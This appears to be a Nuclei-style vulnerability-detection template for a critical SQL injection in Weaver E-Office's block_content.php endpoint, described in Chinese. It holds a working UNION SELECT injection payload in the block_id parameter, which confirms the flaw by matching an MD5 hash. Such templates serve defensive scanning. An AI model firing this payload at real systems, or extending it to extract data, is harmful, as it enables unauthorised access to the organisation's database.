http:
    - matchers:
        - part: body
          type: word
          words:
            - e10adc3949ba59abbe56e057f20f883e
        - status:
            - 200
          type: status
      matchers-condition: and
      method: GET
      path:
        - '{{BaseURL}}/general/new_mytable/block_content.php?block_id=1%20UNION%20ALL%20SELECT%20CONCAT(0x71787a6a71,IFNULL(CAST(md5(123456)%20AS%20NCHAR),0x20),0x7171627671)--%20-'
id: weaver-eoffice-blockcontent-sqli
info:
    author: onewin
    description: |
        泛微E-Office的block_content.php接口存在SQL注入漏洞，攻击者可获取数据库敏感信息[漏洞发现时间：2025-03-17]
    name: 泛微E-Office block_content.php SQL注入漏洞
    reference:
        - https://mrxn.net/jswz/eoffice-general-new_mytable-block_content-sqli.html
    severity: critical
    tags:
        - 泛微-EOffice
        - 泛微-协同办公OA
        - e-office
        - 泛微e-office
